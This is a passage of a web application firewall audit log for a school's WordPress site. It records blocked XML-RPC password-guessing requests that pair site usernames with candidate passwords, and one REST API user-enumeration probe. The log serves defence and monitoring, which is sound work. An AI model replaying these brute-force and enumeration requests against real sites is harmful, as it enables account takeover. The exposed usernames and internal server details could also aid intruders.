(CVE-2013-0235)|Source 118.195.130.163 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749870571441835 5264 (- - -) Stopwatch2: 1749870571441835 5264; combined=3740, p1=478, p2=3092, p3=0, p4=0, p5=100, sr=98, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44bca62b-Z-- --8f3fa82b-A-- [14/Jun/2025:10:10:31 +0700] aEzoJ2IDXuKmWNi2UBS5DQAAAFI 103.236.140.4 45196 103.236.140.4 8181 --8f3fa82b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8f3fa82b-C-- wp.getUsersBlogs timkreatif 852654 --8f3fa82b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f3fa82b-E-- --8f3fa82b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749870631271887 4207 (- - -) Stopwatch2: 1749870631271887 4207; combined=3264, p1=374, p2=2724, p3=0, p4=0, p5=96, sr=80, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f3fa82b-Z-- --ce4bdc31-A-- [14/Jun/2025:10:11:45 +0700] aEzocV3g_boun6Rx5jLTfAAAAMQ 103.236.140.4 45290 103.236.140.4 8181 --ce4bdc31-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ce4bdc31-C-- wp.getUsersBlogs timkreatif power!@# --ce4bdc31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce4bdc31-E-- --ce4bdc31-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (39+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749870705410315 6236 (- - -) Stopwatch2: 1749870705410315 6236; combined=4339, p1=535, p2=3564, p3=0, p4=0, p5=137, sr=99, sw=103, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce4bdc31-Z-- --34002b58-A-- [14/Jun/2025:10:12:46 +0700] aEzormIDXuKmWNi2UBS5RAAAAEk 103.236.140.4 45354 103.236.140.4 8181 --34002b58-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --34002b58-C-- wp.getUsersBlogs timkreatif foofoo --34002b58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --34002b58-E-- --34002b58-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749870766736713 6148 (- - -) Stopwatch2: 1749870766736713 6148; combined=4211, p1=540, p2=3493, p3=0, p4=0, p5=105, sr=92, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --34002b58-Z-- --5666ed11-A-- [14/Jun/2025:10:13:34 +0700] aEzo3l3g_boun6Rx5jLTiAAAANI 103.236.140.4 45484 103.236.140.4 8181 --5666ed11-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5666ed11-C-- wp.getUsersBlogs timkreatif 1234%^&* --5666ed11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5666ed11-E-- --5666ed11-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749870814276542 4573 (- - -) Stopwatch2: 1749870814276542 4573; combined=3476, p1=338, p2=2890, p3=0, p4=0, p5=148, sr=75, sw=100, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5666ed11-Z-- --acf21439-A-- [14/Jun/2025:10:13:46 +0700] aEzo6l3g_boun6Rx5jLTkgAAAMQ 103.236.140.4 45504 103.236.140.4 8181 --acf21439-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --acf21439-C-- wp.getUsersBlogs timkreatif qazxsw --acf21439-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --acf21439-E-- --acf21439-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (71+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749870826046349 4397 (- - -) Stopwatch2: 1749870826046349 4397; combined=3314, p1=350, p2=2795, p3=0, p4=0, p5=98, sr=82, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --acf21439-Z-- --ea39a165-A-- [14/Jun/2025:10:14:50 +0700] aEzpKl3g_boun6Rx5jLTrQAAAMs 103.236.140.4 45572 103.236.140.4 8181 --ea39a165-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ea39a165-C-- wp.getUsersBlogs timkreatif 123456a --ea39a165-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea39a165-E-- --ea39a165-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749870890518921 5373 (- - -) Stopwatch2: 1749870890518921 5373; combined=3780, p1=454, p2=3127, p3=0, p4=0, p5=114, sr=87, sw=85, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea39a165-Z-- --64e0b424-A-- [14/Jun/2025:10:15:55 +0700] aEzpa2mwZ6YUkjOdtI7NagAAABc 103.236.140.4 45714 103.236.140.4 8181 --64e0b424-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --64e0b424-C-- wp.getUsersBlogs timkreatif george --64e0b424-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --64e0b424-E-- --64e0b424-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (65+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749870955425014 5527 (- - -) Stopwatch2: 1749870955425014 5527; combined=3804, p1=501, p2=3132, p3=0, p4=0, p5=101, sr=101, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --64e0b424-Z-- --e3f2eb6d-A-- [14/Jun/2025:10:16:34 +0700] aEzpkkMWfhkd5Y0sFtru_gAAAJI 103.236.140.4 45844 103.236.140.4 8181 --e3f2eb6d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.72.202.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.72.202.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e3f2eb6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e3f2eb6d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749870994255158 2736 (- - -) Stopwatch2: 1749870994255158 2736; combined=1212, p1=406, p2=777, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e3f2eb6d-Z-- --547b3f4e-A-- [14/Jun/2025:10:16:56 +0700] aEzpqEMWfhkd5Y0sFtrvFQAAAJQ 103.236.140.4 45896 103.236.140.4 8181 --547b3f4e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --547b3f4e-C-- wp.getUsersBlogs timkreatif aaron431 --547b3f4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --547b3f4e-E-- --547b3f4e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (87+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749871016669148 4178 (- - -) Stopwatch2: 1749871016669148 4178; combined=3235, p1=381, p2=2673, p3=0, p4=0, p5=104, sr=83, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --547b3f4e-Z-- --c0b2784d-A-- [14/Jun/2025:10:17:59 +0700] aEzp52mwZ6YUkjOdtI7NtAAAAAY 103.236.140.4 46092 103.236.140.4 8181 --c0b2784d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c0b2784d-C-- wp.getUsersBlogs timkreatif arsenal1 --c0b2784d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0b2784d-E-- --c0b2784d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (90+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749871079543871 5449 (- - -) Stopwatch2: 1749871079543871 5449; combined=3855, p1=487, p2=3196, p3=0, p4=0, p5=101, sr=96, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0b2784d-Z-- --9b4c4f00-A-- [14/Jun/2025:10:19:04 +0700] aEzqKF3g_boun6Rx5jLTwgAAAMo 103.236.140.4 46226 103.236.140.4 8181 --9b4c4f00-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9b4c4f00-C-- wp.getUsersBlogs timkreatif playboy --9b4c4f00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9b4c4f00-E-- --9b4c4f00-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (61+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749871144423019 5851 (- - -) Stopwatch2: 1749871144423019 5851; combined=4080, p1=512, p2=3373, p3=0, p4=0, p5=112, sr=103, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b4c4f00-Z-- --a4084234-A-- [14/Jun/2025:10:20:05 +0700] aEzqZWmwZ6YUkjOdtI7N4wAAABg 103.236.140.4 46338 103.236.140.4 8181 --a4084234-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a4084234-C-- wp.getUsersBlogs timkreatif shaggy --a4084234-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a4084234-E-- --a4084234-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (41+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749871205194913 6068 (- - -) Stopwatch2: 1749871205194913 6068; combined=4210, p1=546, p2=3487, p3=0, p4=0, p5=105, sr=94, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a4084234-Z-- --013ec053-A-- [14/Jun/2025:10:21:08 +0700] aEzqpEMWfhkd5Y0sFtrvlgAAAJQ 103.236.140.4 46366 103.236.140.4 8181 --013ec053-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --013ec053-C-- wp.getUsersBlogs miswan hMRgaTlMUWYb --013ec053-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --013ec053-E-- --013ec053-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (10+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749871268908042 5487 (- - -) Stopwatch2: 1749871268908042 5487; combined=3833, p1=494, p2=3169, p3=0, p4=0, p5=100, sr=105, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --013ec053-Z-- --c6824a05-A-- [14/Jun/2025:10:22:08 +0700] aEzq4EMWfhkd5Y0sFtrvygAAAJc 103.236.140.4 46494 103.236.140.4 8181 --c6824a05-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c6824a05-C-- wp.getUsersBlogs miswan servmask --c6824a05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6824a05-E-- --c6824a05-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (62+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749871328274397 5205 (- - -) Stopwatch2: 1749871328274397 5205; combined=3693, p1=420, p2=3062, p3=0, p4=0, p5=120, sr=94, sw=91, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6824a05-Z-- --82025340-A-- [14/Jun/2025:10:23:09 +0700] aEzrHV3g_boun6Rx5jLTzwAAANg 103.236.140.4 46644 103.236.140.4 8181 --82025340-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --82025340-C-- wp.getUsersBlogs miswan Admin123456 --82025340-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --82025340-E-- --82025340-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (71+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749871389924025 6252 (- - -) Stopwatch2: 1749871389924025 6252; combined=4336, p1=576, p2=3564, p3=0, p4=0, p5=115, sr=99, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82025340-Z-- --c854b173-A-- [14/Jun/2025:10:24:09 +0700] aEzrWUMWfhkd5Y0sFtrwKAAAAIA 103.236.140.4 46706 103.236.140.4 8181 --c854b173-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 